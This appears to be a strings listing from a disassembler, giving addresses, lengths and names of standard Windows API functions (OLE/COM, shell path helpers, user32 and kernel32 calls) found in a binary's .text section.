.text:00419C98 00000014 C OleCreateFromFileEx

.text:00419CAC 00000012 C OleCreateFromFile

.text:00419CC0 00000014 C OleCreateFromDataEx

.text:00419CD4 00000012 C OleCreateFromData

.text:00419CE8 0000000C C OleCreateEx

.text:00419CF4 00000019 C OleCreateEmbeddingHelper

.text:00419D10 00000018 C OleCreateDefaultHandler

.text:00419D28 0000000A C OleCreate

.text:00419D34 00000020 C OleConvertOLESTREAMToIStorageEx

.text:00419D54 0000001E C OleConvertOLESTREAMToIStorage

.text:00419D74 00000020 C OleConvertIStorageToOLESTREAMEx

.text:00419D94 0000001E C OleConvertIStorageToOLESTREAM

.text:00419DB4 00000010 C OleBuildVersion

.text:00419DC4 00000016 C MonikerRelativePathTo

.text:00419DDC 00000018 C MonikerCommonPrefixWith

.text:00419DF4 00000013 C MkParseDisplayName

.text:00419E08 0000000C C IsEqualGUID

.text:00419E14 0000000E C IsAccelerator

.text:00419E24 0000000E C IIDFromString

.text:00419E34 00000016 C GetRunningObjectTable

.text:00419E4C 00000011 C GetHookInterface

.text:00419E60 00000015 C GetHGlobalFromStream

.text:00419E78 00000019 C GetHGlobalFromILockBytes

.text:00419E94 00000012 C GetDocumentBitStg

.text:00419EA8 0000000E C GetConvertStg

.text:00419EB8 0000000D C GetClassFile

.text:00419EC8 00000015 C FreePropVariantArray

.text:00419EE0 00000011 C EnableHookObject

.text:00419EF4 0000000B C DoDragDrop

.text:00419F00 00000016 C DllDebugObjectRPCHook

.text:00419F18 00000016 C CreateStreamOnHGlobal

.text:00419F30 00000015 C CreatePointerMoniker

.text:00419F48 00000016 C CreateOleAdviseHolder

.text:00419F60 00000014 C CreateObjrefMoniker

.text:00419F74 00000012 C CreateItemMoniker

.text:00419F88 0000001A C CreateILockBytesOnHGlobal

.text:00419FA4 00000017 C CreateGenericComposite

.text:00419FBC 00000012 C CreateFileMoniker

.text:00419FD0 00000010 C CreateDataCache

.text:00419FE0 00000017 C CreateDataAdviseHolder

.text:00419FF8 00000013 C CreateClassMoniker

.text:0041A00C 0000000E C CreateBindCtx

.text:0041A01C 00000012 C CreateAntiMoniker

.text:0041A030 00000015 C CoUnmarshalInterface

.text:0041A048 00000013 C CoUnmarshalHresult

.text:0041A05C 0000000F C CoUninitialize

.text:0041F160 00000014 C PathRemoveFileSpecA

.text:0041F174 00000015 C PathRemoveExtensionW

.text:0041F18C 00000015 C PathRemoveExtensionA

.text:0041F1A4 00000012 C PathRemoveBlanksW

.text:0041F1B8 00000012 C PathRemoveBlanksA

.text:0041F1CC 00000015 C PathRemoveBackslashW

.text:0041F1E4 00000015 C PathRemoveBackslashA

.text:0041F1FC 00000010 C PathRemoveArgsW

.text:0041F20C 00000010 C PathRemoveArgsA

.text:0041F21C 00000014 C PathRelativePathToW

.text:0041F230 00000014 C PathRelativePathToA

.text:0041F244 00000011 C PathQuoteSpacesW

.text:0041F258 00000011 C PathQuoteSpacesA

.text:0041F26C 00000017 C PathParseIconLocationW

.text:0041F284 00000017 C PathParseIconLocationA

.text:0041F29C 0000000F C PathMatchSpecW

.text:0041F2AC 0000000F C PathMatchSpecA

.text:0041F2BC 00000016 C PathMakeSystemFolderW

.text:0041F2D4 00000016 C PathMakeSystemFolderA

.text:0041F2EC 00000010 C PathMakePrettyW

.text:0041F2FC 00000010 C PathMakePrettyA

.text:0041F30C 0000000B C PathIsURLW

.text:0041F318 0000000B C PathIsURLA

.text:0041F324 0000000B C PathIsUNCW

.text:0041F330 00000011 C PathIsUNCServerW

.text:0041F344 00000016 C PathIsUNCServerShareW

.text:0041F35C 00000016 C PathIsUNCServerShareA

.text:0041F374 00000011 C PathIsUNCServerA

.text:0041F388 0000000B C PathIsUNCA

.text:0041F394 00000014 C PathIsSystemFolderW

.text:0041F3A8 00000014 C PathIsSystemFolderA

.text:0041F3BC 00000010 C PathIsSameRootW

.text:0041F3CC 00000010 C PathIsSameRootA

.text:0041F3DC 0000000C C PathIsRootW

.text:0041F3E8 0000000C C PathIsRootA

.text:0041F3F4 00000010 C PathIsRelativeW

.text:0041F404 00000010 C PathIsRelativeA

.text:0041F414 0000000E C PathIsPrefixW

.text:0041F424 0000000E C PathIsPrefixA

.text:0041F434 00000013 C PathIsNetworkPathW

.text:0041F448 00000013 C PathIsNetworkPathA

.text:0041F45C 00000013 C PathIsLFNFileSpecW

.text:0041F470 00000013 C PathIsLFNFileSpecA

.text:0041F484 00000010 C PathIsFileSpecW

.text:0041F494 00000010 C PathIsFileSpecA

.text:0041F4A4 00000011 C PathIsDirectoryW

.text:0041F4B8 00000016 C PathIsDirectoryEmptyW

.text:0041F4D0 00000016 C PathIsDirectoryEmptyA

.text:0041F4E8 00000011 C PathIsDirectoryA

.text:0041F4FC 00000013 C PathIsContentTypeW

.text:0041F510 00000013 C PathIsContentTypeA

.text:0041F524 00000014 C PathGetDriveNumberW

.text:0041F538 00000014 C PathGetDriveNumberA

.text:0041F54C 00000011 C PathGetCharTypeW

.text:0041F560 00000011 C PathGetCharTypeA

.text:0041F574 0000000D C PathGetArgsW

.text:0041F584 0000000D C PathGetArgsA

.text:0041F594 00000015 C PathFindSuffixArrayW

.text:0041F5AC 00000015 C PathFindSuffixArrayA

.text:0041F5C4 00000010 C PathFindOnPathW

.text:0041F5D4 00000010 C PathFindOnPathA

.text:0041F5E4 00000017 C PathFindNextComponentW

.text:0041F5FC 00000017 C PathFindNextComponentA

.text:0041F614 00000012 C PathFindFileNameW

.text:0041F628 00000012 C PathFindFileNameA

.text:0041F63C 00000013 C PathFindExtensionW

.text:0041F650 00000013 C PathFindExtensionA

.text:0041F664 00000010 C PathFileExistsW

.text:0041F674 00000010 C PathFileExistsA

.text:0041F684 00000013 C PathCreateFromUrlW

.text:0041A06C 0000000F C CoTreatAsClass

.text:0041A07C 00000011 C CoTaskMemRealloc

.text:0041A090 0000000E C CoTaskMemFree

.text:0041A0A0 0000000F C CoTaskMemAlloc

.text:0041A0B0 00000014 C CoSwitchCallContext

.text:0041A0C4 00000016 C CoSuspendClassObjects

.text:0041A0DC 00000012 C CoSetProxyBlanket

.text:0041A0F0 00000012 C CoRevokeMallocSpy

.text:0041A104 00000014 C CoRevokeClassObject

.text:0041A118 0000000F C CoRevertToSelf

.text:0041A128 00000015 C CoResumeClassObjects

.text:0041A140 00000017 C CoReleaseServerProcess

.text:0041A158 00000015 C CoReleaseMarshalData

.text:0041A170 00000014 C CoRegisterSurrogate

.text:0041A184 00000012 C CoRegisterPSClsid

.text:0041A198 00000018 C CoRegisterMessageFilter

.text:0041A1B0 00000014 C CoRegisterMallocSpy

.text:0041A1C4 00000016 C CoRegisterClassObject

.text:0041A1DC 00000016 C CoRegisterChannelHook

.text:0041A1F4 00000015 C CoQueryReleaseObject

.text:0041A20C 00000014 C CoQueryProxyBlanket

.text:0041A220 00000015 C CoQueryClientBlanket

.text:0041A238 0000001E C CoQueryAuthenticationServices

.text:0041A258 00000013 C CoMarshalInterface

.text:0041A26C 00000026 C CoMarshalInterThreadInterfaceInStream

.text:0041A294 00000011 C CoMarshalHresult

.text:0041A2A8 00000015 C CoLockObjectExternal

.text:0041A2C0 0000000E C CoLoadLibrary

.text:0041A2D0 0000000E C CoIsOle1Class

.text:0041A2E0 00000015 C CoIsHandlerConnected

.text:0041A2F8 00000015 C CoInitializeSecurity

.text:0041A310 0000000F C CoInitializeEx

.text:0041A320 0000000D C CoInitialize

.text:0041A330 00000014 C CoImpersonateClient

.text:0041A344 00000012 C CoGetTreatAsClass

.text:0041A358 00000015 C CoGetStandardMarshal

.text:0041A370 0000000D C CoGetPSClsid

.text:0041A380 0000000C C CoGetObject

.text:0041A38C 00000014 C CoGetMarshalSizeMax

.text:0041A3A0 0000000C C CoGetMalloc

.text:0041A3AC 0000001F C CoGetInterfaceAndReleaseStream

.text:0041A3CC 0000001A C CoGetInstanceFromIStorage

.text:0041A3E8 00000016 C CoGetInstanceFromFile

.text:0041A400 00000014 C CoGetCurrentProcess

.text:0041A414 0000001C C CoGetCurrentLogicalThreadId

.text:0041A430 00000011 C CoGetClassObject

.text:0041A444 0000000F C CoGetCallerTID

.text:0041A454 00000011 C CoGetCallContext

.text:0041A468 00000016 C CoFreeUnusedLibraries

.text:0041A480 0000000E C CoFreeLibrary

.text:0041A490 00000013 C CoFreeAllLibraries

.text:0041A4A4 00000018 C CoFileTimeToDosDateTime

.text:0041A4BC 0000000E C CoFileTimeNow

.text:0041A4CC 00000018 C CoDosDateTimeToFileTime

.text:0041A4E4 00000013 C CoDisconnectObject

.text:0041A4F8 00000013 C CoCreateInstanceEx

.text:0041A50C 00000011 C CoCreateInstance

.text:0041A520 0000000D C CoCreateGuid

.text:0041A530 0000001E C CoCreateFreeThreadedMarshaler

.text:0041A550 0000000C C CoCopyProxy

.text:0041A55C 0000000F C CoBuildVersion

.text:0041A56C 00000016 C CoAddRefServerProcess

.text:0041A584 00000010 C CLSIDFromString

.text:0041A594 00000010 C CLSIDFromProgID

.text:0041A5A4 0000000C C BindMoniker

.text:0041A5B0 00000010 C WindowFromPoint

.text:0041A5C0 0000000D C WindowFromDC

.text:0041A5D0 00000009 C WinHelpW

.text:0041A5DC 00000009 C WinHelpA

.text:0041A5E8 0000000C C WaitMessage

.text:0041F698 00000013 C PathCreateFromUrlA

.text:0041F6AC 00000011 C PathCompactPathW

.text:0041F6C0 00000013 C PathCompactPathExW

.text:0041F6D4 00000013 C PathCompactPathExA

.text:0041F6E8 00000011 C PathCompactPathA

.text:0041F6FC 00000012 C PathCommonPrefixW

.text:0041F710 00000012 C PathCommonPrefixA

.text:0041F724 0000000D C PathCombineW

.text:0041F734 0000000D C PathCombineA

.text:0041F744 00000012 C PathCanonicalizeW

.text:0041F758 00000012 C PathCanonicalizeA

.text:0041F76C 0000000F C PathBuildRootW

.text:0041F77C 0000000F C PathBuildRootA

.text:0041F78C 0000000C C PathAppendW

.text:0041F798 0000000C C PathAppendA

.text:0041F7A4 00000012 C PathAddExtensionW

.text:0041F7B8 00000012 C PathAddExtensionA

.text:0041F7CC 00000012 C PathAddBackslashW

.text:0041F7E0 00000012 C PathAddBackslashA

.text:0041F7F4 00000011 C IntlStrEqWorkerW

.text:0041F808 00000011 C IntlStrEqWorkerA

.text:0041F81C 00000009 C HashData

.text:0041F828 00000011 C GetMenuPosFromID

.text:0041F83C 0000000E C ColorRGBToHLS

.text:0041F84C 0000000E C ColorHLSToRGB

.text:0041F85C 00000010 C ColorAdjustLuma

.text:0041F86C 00000009 C ChrCmpIW

.text:0041F878 00000009 C ChrCmpIA

.text:0041F884 00000012 C AssocQueryStringW

.text:0041F898 00000017 C AssocQueryStringByKeyW

.text:0041F8B0 00000017 C AssocQueryStringByKeyA

.text:0041F8C8 00000012 C AssocQueryStringA

.text:0041F8DC 0000000F C AssocQueryKeyW

.text:0041F8EC 0000000F C AssocQueryKeyA

.text:0041F8FC 00000009 C lstrlenW

.text:0041F908 00000009 C lstrlenA

.text:0041F914 00000008 C lstrlen

.text:0041F91C 0000000A C lstrcpynW

.text:0041F928 0000000A C lstrcpynA

.text:0041F934 00000009 C lstrcpyn

.text:0041F940 00000009 C lstrcpyW

.text:0041F94C 00000009 C lstrcpyA

.text:0041F958 00000008 C lstrcpy

.text:0041F960 0000000A C lstrcmpiW

.text:0041F96C 0000000A C lstrcmpiA

.text:0041F978 00000009 C lstrcmpi

.text:0041F984 00000009 C lstrcmpW

.text:0041F990 00000009 C lstrcmpA

.text:0041F99C 00000008 C lstrcmp

.text:0041F9A4 00000009 C lstrcatW

.text:0041F9B0 00000009 C lstrcatA

.text:0041F9BC 00000008 C lstrcat

.text:0041F9C4 0000000E C WriteTapemark

.text:0041F9D4 00000014 C WriteProfileStringW

.text:0041F9E8 00000014 C WriteProfileStringA

.text:0041F9FC 00000015 C WriteProfileSectionW

.text:0041FA14 00000015 C WriteProfileSectionA

.text:0041FA2C 00000013 C WriteProcessMemory

.text:0041FA40 0000001B C WritePrivateProfileStructW

.text:0041FA5C 0000001B C WritePrivateProfileStructA

.text:0041FA78 0000001B C WritePrivateProfileStringW

.text:0041FA94 0000001B C WritePrivateProfileStringA

.text:0041FAB0 0000001C C WritePrivateProfileSectionW

.text:0041FACC 0000001C C WritePrivateProfileSectionA

.text:0041FAE8 00000010 C WriteFileGather

.text:0041FAF8 0000000C C WriteFileEx

.text:0041FB04 0000000A C WriteFile

.text:0041FB10 0000000E C WriteConsoleW

.text:0041FB20 00000014 C WriteConsoleOutputW

.text:0041FB34 0000001D C WriteConsoleOutputCharacterW

.text:0041A5F4 00000011 C WaitForInputIdle

.text:0041A608 00000013 C WINNLSGetIMEHotkey

.text:0041A61C 00000016 C WINNLSGetEnableStatus

.text:0041A634 00000010 C WINNLSEnableIME

.text:0041A644 0000000B C VkKeyScanW

.text:0041A650 0000000D C VkKeyScanExW

.text:0041A660 0000000D C VkKeyScanExA

.text:0041A670 0000000B C VkKeyScanA

.text:0041A67C 0000000C C ValidateRgn

.text:0041A688 0000000D C ValidateRect

.text:0041A698 0000000D C UpdateWindow

.text:0041A6A8 00000011 C UnregisterHotKey

.text:0041A6BC 0000001D C UnregisterDeviceNotification

.text:0041A6DC 00000011 C UnregisterClassW

.text:0041A6F0 00000011 C UnregisterClassA

.text:0041A704 00000010 C UnpackDDElParam

.text:0041A714 00000015 C UnloadKeyboardLayout

.text:0041A72C 0000000A C UnionRect

.text:0041A738 00000014 C UnhookWindowsHookEx

.text:0041A74C 00000012 C UnhookWindowsHook

.text:0041A760 0000000F C UnhookWinEvent

.text:0041A770 00000011 C TranslateMessage

.text:0041A784 00000015 C TranslateMDISysAccel

.text:0041A79C 00000016 C TranslateAcceleratorW

.text:0041A7B4 00000016 C TranslateAcceleratorA

.text:0041A7CC 00000015 C TranslateAccelerator

.text:0041A7E4 00000011 C TrackPopupMenuEx

.text:0041A7F8 0000000F C TrackPopupMenu

.text:0041A808 00000010 C TrackMouseEvent

.text:0041A818 0000000C C ToUnicodeEx

.text:0041A824 0000000A C ToUnicode

.text:0041A830 0000000A C ToAsciiEx

.text:0041A83C 00000008 C ToAscii

.text:0041A844 0000000C C TileWindows

.text:0041A850 00000011 C TileChildWindows

.text:0041A864 0000000F C TabbedTextOutW

.text:0041A874 0000000F C TabbedTextOutA

.text:0041A884 00000016 C SystemParametersInfoW

.text:0041A89C 00000016 C SystemParametersInfoA

.text:0041A8B4 00000013 C SwitchToThisWindow

.text:0041A8C8 0000000E C SwitchDesktop

.text:0041A8D8 00000010 C SwapMouseButton

.text:0041A8E8 0000000D C SubtractRect

.text:0041A8F8 00000010 C ShowWindowAsync

.text:0041A908 0000000B C ShowWindow

.text:0041A914 0000000E C ShowScrollBar

.text:0041A925 0000000F C howOwnedPopups

.text:0041A934 0000000B C ShowCursor

.text:0041A940 0000000A C ShowCaret

.text:0041A94C 00000010 C SetWindowsHookW

.text:0041A95C 00000012 C SetWindowsHookExW

.text:0041A970 00000012 C SetWindowsHookExA

.text:0041A984 00000010 C SetWindowsHookA

.text:0041A994 0000000E C SetWindowWord

.text:0041A9A4 0000000F C SetWindowTextW

.text:0041A9B4 0000000F C SetWindowTextA

.text:0041A9C4 0000000D C SetWindowRgn

.text:0041A9D4 0000000D C SetWindowPos

.text:0041A9E4 00000013 C SetWindowPlacement

.text:0041A9F8 0000000F C SetWindowLongW

.text:0041AA08 0000000F C SetWindowLongA

.text:0041AA18 00000017 C SetWindowContextHelpId

.text:0041AA30 00000010 C SetWinEventHook

.text:0041AA40 00000016 C SetUserObjectSecurity

.text:0041AA58 0000001A C SetUserObjectInformationW

.text:0041AA74 0000001A C SetUserObjectInformationA

.text:0041AA90 00000009 C SetTimer

.text:0041AA9C 00000011 C SetThreadDesktop

.text:0041AAB0 00000010 C SetSystemCursor

.text:0041AAC0 0000000D C SetSysColors

.text:0041FB54 0000001D C WriteConsoleOutputCharacterA

.text:0041FB74 0000001C C WriteConsoleOutputAttribute

.text:0041FB90 00000014 C WriteConsoleOutputA

.text:0041FBA4 00000013 C WriteConsoleInputW

.text:0041FBB8 00000013 C WriteConsoleInputA

.text:0041FBCC 0000000E C WriteConsoleA

.text:0041FBDC 00000008 C WinExec

.text:0041FBE4 00000014 C WideCharToMultiByte

.text:0041FBF8 0000000F C WaitNamedPipeW

.text:0041FC08 0000000F C WaitNamedPipeA

.text:0041FC18 00000016 C WaitForSingleObjectEx

.text:0041FC30 00000014 C WaitForSingleObject

.text:0041FC44 00000019 C WaitForMultipleObjectsEx

.text:0041FC60 00000017 C WaitForMultipleObjects

.text:0041FC78 00000012 C WaitForDebugEvent

.text:0041FC8C 0000000E C WaitCommEvent

.text:0041FC9C 0000000E C VirtualUnlock

.text:0041FCAC 0000000F C VirtualQueryEx

.text:0041FCBC 0000000D C VirtualQuery

.text:0041FCCC 00000011 C VirtualProtectEx

.text:0041FCE0 0000000F C VirtualProtect

.text:0041FCF0 0000000C C VirtualLock

.text:0041FCFC 0000000E C VirtualFreeEx

.text:0041FD0C 0000000C C VirtualFree

.text:0041FD18 0000000F C VirtualAllocEx

.text:0041FD28 0000000D C VirtualAlloc

.text:0041FD38 00000011 C VerLanguageNameW

.text:0041FD4C 00000011 C VerLanguageNameA

.text:0041FD60 00000010 C UpdateResourceW

.text:0041FD70 00000010 C UpdateResourceA

.text:0041FD80 00000010 C UnmapViewOfFile

.text:0041FD90 0000000D C UnlockFileEx

.text:0041FDA0 0000000B C UnlockFile

.text:0041FDAC 00000019 C UnhandledExceptionFilter

.text:0041FDC8 00000011 C TransmitCommChar

.text:0041FDDC 00000012 C TransactNamedPipe

.text:0041FDF0 0000001C C Toolhelp32ReadProcessMemory

.text:0041FE0C 0000000C C TlsSetValue

.text:0041FE18 0000000C C TlsGetValue

.text:0041FE24 00000008 C TlsFree

.text:0041FE2C 00000009 C TlsAlloc

.text:0041FE38 0000000D C Thread32Next

.text:0041FE48 0000000E C Thread32First

.text:0041FE58 00000010 C TerminateThread

.text:0041FE68 00000011 C TerminateProcess

.text:0041FE7C 00000020 C SystemTimeToTzSpecificLocalTime

.text:0041FE9C 00000015 C SystemTimeToFileTime

.text:0041FEB4 0000000F C SwitchToThread

.text:0041FEC4 0000000E C SwitchToFiber

.text:0041FED4 0000000E C SuspendThread

.text:0041FEE4 00000008 C SleepEx

.text:0041FEEC 00000006 C Sleep

.text:0041FEF4 0000000F C SizeofResource

.text:0041FF04 00000014 C SignalObjectAndWait

.text:0041FF18 0000000A C SetupComm

.text:0041FF24 00000011 C SetWaitableTimer

.text:0041FF38 00000010 C SetVolumeLabelW

.text:0041FF48 00000010 C SetVolumeLabelA

.text:0041FF58 0000001C C SetUnhandledExceptionFilter

.text:0041FF74 00000017 C SetTimeZoneInformation

.text:0041FF8C 00000017 C SetThreadPriorityBoost

.text:0041FFA4 00000012 C SetThreadPriority

.text:0041FFB8 00000010 C SetThreadLocale

.text:0041FFC8 00000018 C SetThreadIdealProcessor

.text:0041FFE0 00000018 C SetThreadExecutionState

.text:0041FFF8 00000011 C SetThreadContext

.text:0042000C 00000016 C SetThreadAffinityMask

.text:00420024 00000010 C SetTapePosition

.text:00420034 00000012 C SetTapeParameters

.text:00420048 00000018 C SetSystemTimeAdjustment

.text:0041AAD0 0000000F C SetShellWindow

.text:0041AAE0 0000000F C SetScrollRange

.text:0041AAF1 0000000C C etScrollPos

.text:0041AB00 0000000E C SetScrollInfo

.text:0041AB10 0000000D C SetRectEmpty

.text:0041AB20 00000008 C SetRect

.text:0041AB28 00000009 C SetPropW

.text:0041AB34 00000009 C SetPropA

.text:0041AB40 00000018 C SetProcessWindowStation

.text:0041AB59 00000017 C etProcessDefaultLayout

.text:0041AB70 0000000A C SetParent

.text:0041AB7C 00000010 C SetMessageQueue

.text:0041AB8C 00000014 C SetMessageExtraInfo

.text:0041ABA0 00000011 C SetMenuItemInfoW

.text:0041ABB5 00000010 C etMenuItemInfoA

.text:0041ABC8 00000013 C SetMenuItemBitmaps

.text:0041ABDC 0000000C C SetMenuInfo

.text:0041ABE8 00000013 C SetMenuDefaultItem

.text:0041ABFC 00000015 C SetMenuContextHelpId

.text:0041AC14 00000008 C SetMenu

.text:0041AC1C 0000000F C SetLastErrorEx

.text:0041AC2C 00000011 C SetKeyboardState

.text:0041AC40 00000014 C SetForegroundWindow

.text:0041AC54 00000009 C SetFocus

.text:0041AC60 00000013 C SetDoubleClickTime

.text:0041AC74 00000010 C SetDlgItemTextW

.text:0041AC84 00000010 C SetDlgItemTextA

.text:0041AC94 0000000E C SetDlgItemInt

.text:0041ACA4 00000011 C SetDeskWallpaper

.text:0041ACB8 00000013 C SetDebugErrorLevel

.text:0041ACCC 0000000D C SetCursorPos

.text:0041ACDC 0000000A C SetCursor

.text:0041ACE8 00000013 C SetClipboardViewer

.text:0041ACFC 00000011 C SetClipboardData

.text:0041AD10 0000000D C SetClassWord

.text:0041AD20 0000000E C SetClassLongW

.text:0041AD30 0000000E C SetClassLongA

.text:0041AD40 0000000C C SetCaretPos

.text:0041AD4C 00000012 C SetCaretBlinkTime

.text:0041AD60 0000000B C SetCapture

.text:0041AD6C 00000010 C SetActiveWindow

.text:0041AD7C 00000013 C SendNotifyMessageW

.text:0041AD90 00000013 C SendNotifyMessageA

.text:0041ADA4 0000000D C SendMessageW

.text:0041ADB4 00000014 C SendMessageTimeoutW

.text:0041ADC8 00000014 C SendMessageTimeoutA

.text:0041ADDC 00000015 C SendMessageCallbackW

.text:0041ADF4 00000015 C SendMessageCallbackA

.text:0041AE0C 0000000D C SendMessageA

.text:0041AE1C 0000000A C SendInput

.text:0041AE28 00000012 C SendIMEMessageExW

.text:0041AE3C 00000012 C SendIMEMessageExA

.text:0041AE50 00000014 C SendDlgItemMessageW

.text:0041AE64 00000014 C SendDlgItemMessageA

.text:0041AE78 0000000F C ScrollWindowEx

.text:0041AE88 0000000D C ScrollWindow

.text:0041AE98 00000009 C ScrollDC

.text:0041AEA4 0000000F C ScreenToClient

.text:0041AEB4 0000000F C ReuseDDElParam

.text:0041AEC4 0000000D C ReplyMessage

.text:0041AED4 0000000C C RemovePropW

.text:0041AEE0 0000000C C RemovePropA

.text:0041AEEC 0000000B C RemoveMenu

.text:0041AEF8 0000000A C ReleaseDC

.text:0041AF04 0000000F C ReleaseCapture

.text:0041AF14 00000017 C RegisterWindowMessageW

.text:0041AF2C 00000017 C RegisterWindowMessageA

.text:0041AF44 0000000F C RegisterHotKey

.text:0041AF54 0000001C C RegisterDeviceNotificationW

.text:0041AF70 0000001C C RegisterDeviceNotificationA

.text:00420060 0000000E C SetSystemTime

.text:00420070 00000014 C SetSystemPowerState

.text:00420084 0000000D C SetStdHandle

.text:00420094 00000019 C SetProcessWorkingSetSize

.text:004200B0 0000001D C SetProcessShutdownParameters

.text:004200D0 00000018 C SetProcessPriorityBoost

.text:004200E8 00000017 C SetProcessAffinityMask

.text:00420100 00000011 C SetPriorityClass

.text:00420114 00000018 C SetNamedPipeHandleState

.text:0042012C 0000001B C SetMessageWaitingIndicator

.text:00420148 00000010 C SetMailslotInfo

.text:00420158 0000000F C SetLocaleInfoW

.text:00420168 0000000F C SetLocaleInfoA

.text:00420178 0000000D C SetLocalTime

.text:00420188 0000000D C SetLastError

.text:00420198 00000015 C SetHandleInformation

.text:004201B0 0000000F C SetHandleCount

.text:004201C0 0000000C C SetFileTime

.text:004201CC 0000000F C SetFilePointer

.text:004201DC 00000013 C SetFileAttributesW

.text:004201F0 00000013 C SetFileAttributesA

.text:00420204 00000011 C SetFileApisToOEM

.text:00420218 00000012 C SetFileApisToANSI

.text:0042022C 00000009 C SetEvent

.text:00420238 0000000D C SetErrorMode

.text:00420248 00000018 C SetEnvironmentVariableW

.text:00420260 00000018 C SetEnvironmentVariableA

.text:00420278 0000000D C SetEndOfFile

.text:00420288 00000016 C SetDefaultCommConfigW

.text:004202A0 00000016 C SetDefaultCommConfigA

.text:004202B8 00000015 C SetCurrentDirectoryW

.text:004202D0 00000015 C SetCurrentDirectoryA

.text:004202E8 00000015 C SetConsoleWindowInfo

.text:00420300 00000011 C SetConsoleTitleW

.text:00420314 00000011 C SetConsoleTitleA

.text:00420328 00000018 C SetConsoleTextAttribute

.text:00420340 0000001B C SetConsoleScreenBufferSize

.text:0042035D 00000012 C etConsoleOutputCP

.text:00420370 0000000F C SetConsoleMode

.text:00420380 00000019 C SetConsoleCursorPosition

.text:0042039C 00000015 C SetConsoleCursorInfo

.text:004203B4 00000016 C SetConsoleCtrlHandler

.text:004203CC 0000000D C SetConsoleCP

.text:004203DC 0000001D C SetConsoleActiveScreenBuffer

.text:004203FD 00000010 C etComputerNameW

.text:00420410 00000011 C SetComputerNameA

.text:00420424 00000010 C SetCommTimeouts

.text:00420434 0000000D C SetCommState

.text:00420444 0000000C C SetCommMask

.text:00420450 0000000E C SetCommConfig

.text:00420461 0000000C C etCommBreak

.text:00420470 00000011 C SetCalendarInfoW

.text:00420484 00000011 C SetCalendarInfoA

.text:00420498 0000000C C SearchPathW

.text:004204A4 0000000C C SearchPathA

.text:004204B0 0000001B C ScrollConsoleScreenBufferW

.text:004204CD 0000001A C crollConsoleScreenBufferA

.text:004204E8 0000000E C RtlFillMemory

.text:004204F8 0000000D C ResumeThread

.text:00420508 00000010 C ResetWriteWatch

.text:00420518 0000000B C ResetEvent

.text:00420524 00000015 C RequestWakeupLatency

.text:0042053C 00000014 C RequestDeviceWakeup

.text:00420550 00000011 C RemoveDirectoryW

.text:00420564 00000011 C RemoveDirectoryA

.text:00420578 00000011 C ReleaseSemaphore

.text:0042058C 0000000D C ReleaseMutex

.text:0042059C 00000012 C ReadProcessMemory

.text:004205B0 00000010 C ReadFileScatter

.text:004205C0 0000000B C ReadFileEx

.text:0041AF8C 00000019 C RegisterClipboardFormatW

.text:0041AFA8 00000019 C RegisterClipboardFormatA

.text:0041AFC4 0000000F C RegisterClassW

.text:0041AFD4 00000011 C RegisterClassExW

.text:0041AFE8 00000011 C RegisterClassExA

.text:0041AFFC 0000000F C RegisterClassA

.text:0041B00C 0000000D C RedrawWindow

.text:0041B01C 00000013 C RealGetWindowClass

.text:0041B030 00000019 C RealChildWindowFromPoint

.text:0041B04C 00000009 C PtInRect

.text:0041B058 00000013 C PostThreadMessageW

.text:0041B06C 00000013 C PostThreadMessageA

.text:0041B080 00000010 C PostQuitMessage

.text:0041B090 0000000D C PostMessageW

.text:0041B0A0 0000000D C PostMessageA

.text:0041B0B0 0000000D C PeekMessageW

.text:0041B0C0 0000000D C PeekMessageA

.text:0041B0D0 0000000D C PaintDesktop

.text:0041B0E0 0000000E C PackDDElParam

.text:0041B0F0 00000013 C OpenWindowStationW

.text:0041B104 00000013 C OpenWindowStationA

.text:0041B118 00000011 C OpenInputDesktop

.text:0041B12C 00000009 C OpenIcon

.text:0041B138 0000000D C OpenDesktopW

.text:0041B148 0000000D C OpenDesktopA

.text:0041B158 0000000E C OpenClipboard

.text:0041B168 0000000B C OffsetRect

.text:0041B174 0000000B C OemToCharW

.text:0041B180 0000000F C OemToCharBuffW

.text:0041B190 0000000F C OemToCharBuffA

.text:0041B1A0 0000000B C OemToCharA

.text:0041B1AC 0000000B C OemKeyScan

.text:0041B1B8 0000000F C NotifyWinEvent

.text:0041B1C8 0000001C C MsgWaitForMultipleObjectsEx

.text:0041B1E4 0000001A C MsgWaitForMultipleObjects

.text:0041B200 0000000B C MoveWindow

.text:0041B20C 00000012 C MonitorFromWindow

.text:0041B220 00000010 C MonitorFromRect

.text:0041B230 00000011 C MonitorFromPoint

.text:0041B244 0000000C C ModifyMenuW

.text:0041B250 0000000C C ModifyMenuA

.text:0041B25C 0000000C C MessageBoxW

.text:0041B268 00000014 C MessageBoxIndirectW

.text:0041B27C 00000014 C MessageBoxIndirectA

.text:0041B290 0000000E C MessageBoxExW

.text:0041B2A0 0000000E C MessageBoxExA

.text:0041B2B0 0000000C C MessageBoxA

.text:0041B2BC 0000000C C MessageBeep

.text:0041B2C8 00000012 C MenuItemFromPoint

.text:0041B2DC 00000010 C MapWindowPoints

.text:0041B2EC 0000000F C MapVirtualKeyW

.text:0041B2FC 00000011 C MapVirtualKeyExW

.text:0041B310 00000011 C MapVirtualKeyExA

.text:0041B324 0000000F C MapVirtualKeyA

.text:0041B334 0000000E C MapDialogRect

.text:0041B344 0000001C C LookupIconIdFromDirectoryEx

.text:0041B360 0000001A C LookupIconIdFromDirectory

.text:0041B37C 00000011 C LockWindowUpdate

.text:0041B390 0000000C C LoadStringW

.text:0041B39C 0000000C C LoadStringA

.text:0041B3A8 0000000A C LoadMenuW

.text:0041B3B4 00000012 C LoadMenuIndirectW

.text:0041B3C8 00000012 C LoadMenuIndirectA

.text:0041B3DC 0000000A C LoadMenuA

.text:0041B3E8 00000014 C LoadKeyboardLayoutW

.text:0041B3FC 00000014 C LoadKeyboardLayoutA

.text:0041B410 0000000B C LoadImageW

.text:0041B41C 0000000B C LoadImageA

.text:0041B428 0000000A C LoadIconW

.text:0041B434 0000000A C LoadIconA

.text:004205CC 00000009 C ReadFile

.text:004205D8 00000016 C ReadDirectoryChangesW

.text:004205F0 0000000D C ReadConsoleW

.text:00420600 00000013 C ReadConsoleOutputW

.text:00420614 0000001C C ReadConsoleOutputCharacterW

.text:00420630 0000001C C ReadConsoleOutputCharacterA

.text:0042064C 0000001B C ReadConsoleOutputAttribute

.text:00420668 00000013 C ReadConsoleOutputA

.text:0042067C 00000012 C ReadConsoleInputW

.text:00420690 00000012 C ReadConsoleInputA

.text:004206A4 0000000D C ReadConsoleA

.text:004206B4 0000000F C RaiseException

.text:004206C4 0000000D C QueueUserAPC

.text:004206D4 0000001A C QueryPerformanceFrequency

.text:004206F0 00000018 C QueryPerformanceCounter

.text:00420708 00000010 C QueryDosDeviceW

.text:00420718 00000010 C QueryDosDeviceA

